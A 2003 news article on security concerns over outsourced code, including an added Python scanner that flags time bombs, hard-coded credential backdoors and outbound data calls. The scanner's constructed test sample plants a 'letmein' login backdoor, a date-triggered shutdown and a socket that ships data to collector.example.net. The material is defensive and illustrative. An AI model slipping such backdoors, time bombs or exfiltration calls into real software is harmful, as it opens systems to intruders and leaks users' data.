Outsourced code raises security concerns

Security concerns are growing over the amount of code that is being outsourced to development companies. The recent FBI raid on a US software company suspected of having links with al-Qadi highlighted the issue.

By Matthew Southwell. Published January 29, 2003

Security concerns are growing over the amount of code that is being outsourced to development companies. The recent FBI raid on a US software company suspected of having links with al-Qadi highlighted the issue and it has been discussed at the highest level of the US government.

“This has come up as part of a broader discussion on how do we get trust and reliability [in computer systems,]” Howard Schmidt, vice-chairman of President Bush’s critical infrastructure protection board, told the New York Times.

While companies using development centres in the newer offshore locations such as Russia, Indonesia and the Philippines are advised to be particularly cautious, the issue encompasses all outsourcers around the world. “Irrespective of where it’s done, we need to make sure that our code is clean and protected across the board,” Schmidt said.

A number of potential security threats can be hidden in software code: backdoors, which let hackers bypass security controls; time bombs, which bring down an entire system on a set date; and code that sends data out to an unauthorised third party.

“There’s a good chance that if people haven’t taken precautions in setting up their network, they might not even know this was occurring,” warns James Lewis, senior fellow & director of technology policy, Center for Strategic & International Studies.

Using bigger, more established development companies offers the best protection against these kinds of threats. However, these precautions can be undermined by the fact that some of these large companies also subcontract development to smaller software houses. As such, Lewis advises organisations to be aware of the potential threats and to ensure that they know who will develop the code.

“If I was a big company I would always ask where does this software come from and who wrote it?” he says.

The large development companies say end users are aware of the issue, although they insist there is no need for alarm: their quality assurance programmes, they say, ensure that all code is double-checked before the end user receives it.

“There is very heavy tracking of what people are doing,” says Ajith Menon, director & head of operations, MEA, Satyam Computer Services.

Extensive testing is also undertaken to ensure that the code works, and end users sometimes repeat that testing themselves. This will uncover most bugs in a system, but problems such as backdoors and time bombs can only be found by analysing the code itself. That kind of analysis is all but impossible for an end user, however, since it means hunting for a couple of lines in a massive body of code.
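A review of the code cannot be a print-out read end to end, so in practice it starts with automated heuristics that shrink the code base to a short list of lines worth a human's attention. The scanner below is an added example, not code from the article or from any vendor it quotes; its three rules map onto the three threat classes the article names, and the source it scans is a constructed sample with planted findings, not a real project.

```python
"""Heuristic source scan for date-triggered "time bombs", hard-coded
credential backdoors and code that ships data to a fixed outside host.
Hits are review leads, not proof; each one still needs a human to read
the surrounding code.  Constructed example, not tied to any real project."""
import re

# Each rule is (category, pattern).  Patterns are deliberately broad: the
# aim is to turn millions of lines into a handful worth reading, accepting
# some false positives in exchange for few misses.
DATE = r"\b(19|20)\d{2}\s*[-/,]\s*\d{1,2}\s*[-/,]\s*\d{1,2}"
RULES = [
    # the current date/time compared against a literal calendar date
    ("time-bomb", re.compile(
        r"(now|today|time|date)\b.*(>=|>|==|<=|<).*" + DATE)),
    # a credential compared directly against a string literal
    ("hard-coded-credential", re.compile(
        r"""\b(pass(word|wd)?|pwd|user(name)?|token|secret)\b\s*={2,3}\s*['"][^'"]+['"]""")),
    # an outbound connection or request to a literal, non-local host
    ("outbound-to-fixed-host", re.compile(
        r"""(connect|urlopen|post|get|sendto)\s*\(.*['"](https?://|)(?!localhost|127\.)[\w.-]+\.[a-z]{2,}""")),
]

def scan_source(text):
    """Return [(line_no, category, stripped line)] for every rule that fires."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]          # ignore trailing comments
        for category, pattern in RULES:
            if pattern.search(code):
                findings.append((no, category, line.strip()))
    return findings

# Constructed sample: ordinary-looking code with three planted problems.
# halt_all_services, rotate_logs and check_hash are hypothetical helpers.
SAMPLE = '''\
import socket
from datetime import date
def login(user, password):
    if user == "support" and password == "letmein":   # planted backdoor
        return True
    return check_hash(user, password)
def housekeeping():
    if date.today() >= date(2003, 6, 30):              # planted time bomb
        halt_all_services()
    rotate_logs()
def report(stats):
    s = socket.socket(); s.connect(("collector.example.net", 8080))  # planted exfil
    s.send(str(stats).encode())
'''

if __name__ == "__main__":
    for no, category, line in scan_source(SAMPLE):
        print(f"line {no:>3}  {category:<24} {line}")
```

Run against a real tree, the rules would be tuned per language and the hit list handed to a reviewer; the scan replaces the impossible full read-through, not the reviewer.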

“Unfortunately programmes are so huge now, with millions of lines of code, it’s not like you can say ‘give me a print out, I’m going to look at this’,” notes Lewis.

As such, Lewis advises companies to ask about these kinds of issues, and make sure that they are aware of any backdoors, for instance, that have been left in the code.

“If they tell you, that’s fine. If you don’t know about it though, then it’s a risk. It’s like having a door into your house you don’t know about,” he says.

Such backdoors are used to help programmers quickly access the right piece of code while doing development work. However, the vendors say their use is on the decline and that if they are used, then internal controls ensure they are removed before the code is given to the client.

“Usually the client is informed about these things… [but] people don’t very often do that [use backdoors] — not anymore,” says Ali Sheikh, marketing director, Acrologix.

The offshore industry, in particular, has good reason to ensure that this remains the case, as any major incident is likely to hit its sales dramatically. It will always be cheaper than Western and Middle East rivals, but such cost savings will do little to overcome any security fears that may be generated.

“If someone decides that their software isn’t trustworthy, their market dries up instantly…. [So] there’s an incentive for those countries where you are seeing a lot of offshore code writing to make sure they are doing a good job,” says Lewis.
